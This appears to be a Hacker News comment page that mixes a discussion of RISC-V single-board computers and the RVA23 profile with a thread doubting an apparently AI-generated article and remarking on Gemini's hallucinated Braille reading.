There are also 8 additional SpacemiT-A100 cores with 1024-bit wide vectors, which are more like an additional accelerator for number crunshing.

The Milk-V Titan has slightly faster scalar performance, than the K3.


> faster than Pi4 but slower than Pi5

It may actually be faster than a Pi5.

The benchmark is well tuned for ARM64 but not so well adapted to RISC-V, especially the vector extensions.

You may still be right of course. The SpaceMIT K3 is exciting because it may still be the first RVA23 hardware but it is not exectly going to launch a RISC-V laptop industry.


There isn't much to tune in some, e.g. the clang benchmark. We know that many of the benchmarks already have RVV support (compare BPI-F3 results between versions) and three are still missing RVV support. I think the optimized score would be in the 500s, but that's still a lot lower than Pi5.


> The Milk-V Titan has slightly faster scalar performance, than the K3.

So the main difference between this Milk-V Titan and the upcoming SpacemiT K3 is that the latter has better vector performance?


The Titan has no SIMD/Vector support at all, so it doesn't support RVA23.


The K3 is able to run RVA23 code, the Titan is not; it lacks V.

It matters, as the ecosystem settled on RVA23 as the baseline for application processors.


Well, today it is only Ubuntu 25.10 and newer that require RVA23. Almost everything else will run on plain old RV64GC which this board handles no problem.

But you are correct that once RVA23 chips begin to appear, everybody will move to it quite quickly.

RVA23 provides essentially the same feature-set as ARM64 or x86-64v4 including both virtualization and vector capabilities. In other words, RVA23 is the first RISC-V profile to match what modern applications and workflows require.

The good news is that I expect this to remain the minimum profile for quite a long time. Even once RVA30 and future profiles appear, there may not be much pressure for things like Linux distributions to drop support for RVA23. This is a lot like the modern x86-64 space where almost all Linux distributions work just fine on x86-64 v1 even though there are now v2, v3, and v4 available as well. You can run the latest edition of Arch Linux on hardware from 2005. It is hard to predict the future but it would not surprise me if Ubuntu 30.04 LTS ran just fine on RISC-V hardware released later this year.

But ya, anything before RVA23, like the RVA22 Titan we are discussing here, will be stuck forever on older distros or custom builds (like Ubuntu 25.04).


> As far as I know, there's still no real RISC-V equivalent to Raspberry Pi

The SpaceMIT K3 is rumored to be announced at FOSDEM (January 31, 2026)

https://www.reddit.com/r/RISCV/comments/1qdvw4l/k3_x100_a100...

Also at FOSDEM, mainline support for Orange Pi RV2 https://fosdem.org/2026/schedule/event/VF9CHG-mainline-suppo...


DeepComputing has announced a SpacemiT K3 based Framework laptop mainboard.

https://deepcomputing.io/dc-roma-risc-v-mainboard-iii-unveil...



I'm not even sure it's just instruction support that's the problem with the RV2. I bought one since I thought it would be cool to write a bare metal os for it (especially after I found the AI results to be so bad.) But the lack of documentation has been making it very hard to get anything actually up and running. The best I've got is compiling their custom u-boot and linux repos, and even those come with some problems.


I have been disappointed with Orange Pi hardware, I am not surprised.

Seldom does an SBC vendor want to actually support their products. You get the distro they made at launch, that is it. They do no updates or support. They just want to sell an overpriced chipset with a fucked and unwieldy boot sequence.

Same thing with all the Android devices. Pick a version of Android that you like because that's what you'll have on it forever.



My Pixel has gotten a couple major Android version bumps.


I’d also like an updated RISC-V Framework laptop board. There is one but it’s too limited. If they came out with that I’d try it as a laptop.

I mean a board with decent storage and better performance.


Did you paste the wrong link? While the OP of that thread was accussed of using LLMs, the thread doesn't really match what the article describes.

I think this one is a much closer fit: https://news.ycombinator.com/item?id=46661308


I find it worrying that this was upvoted so much so quickly, and HN users are apparently unable to spot the glaring red flags about this article.

1. Let's start with where the post was published. Check what kind of content this blog publishes - huge volumes of random low-effort AI-boosting posts with AI-generated images. This isn't a blog about history or linguistics.

2. The author is anonymous.

3. The contents of the post itself: it's just raw AI output. There's no expert commentary. It just mentions that unnamed experts were unable to do the job.

This isn't to say that LLMs aren't useful for science; on the contrary. See for example Terence Tao's blog. Notice how different his work is from whatever this post is.


I'm especially suspicious of the handwriting analysis. It seems like the kind of thing a vLLM would be pretty bad at doing and very good at convincingly faking for non-experts.

Gemini 3 Pro, eg, fails very badly at reading the Braille in this image, confusing the English language text for the actual Braille. When you give it just the Braille, it still fails and confidently hallucinates a transcription badly enough that you don't even have to know Braille (I don't!) to see it's wrong.

https://m.facebook.com/groups/dullmensclub/posts/18885933484...

As far as I can tell, Gemini 3 Pro is still completely out of its depth and incapable of understanding Braille at all, and doesn't realize this.


Given how quickly it got upvoted, I also wonder how much of the upvoting itself may be from AI bots.


My first reflex when I see anything “solved” by AI is to go straight to the comments. This time again, I was not disappointed.


I feel sorry for people having to read the internet without the HN comments


That was said about reddit some years ago and now reddit is clearly riddled with astroturfing and other manipulations. We don't know how big the problem on hn already is and how bad it will get. But it would be naive to think, that it doesn't happen here.


True. Sometimes weird links with very few upvotes magically end up in the top 10. But the comments usually bring them back to earth!

The most real benefit of HN vs Reddit is commenters who are actually knowledgeable in that field, who leave a comment or vote up an actually useful comment.


You are anonymous too, so…


I am not announcing a scientific breakthrough.


Happens too often these days. Also, express an unpopular opinion and get downvoted.


In hindsight, one possible reason to bet on November 18 was the deprecation date of older models: https://www.reddit.com/r/singularity/comments/1oom1lq/google...


Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: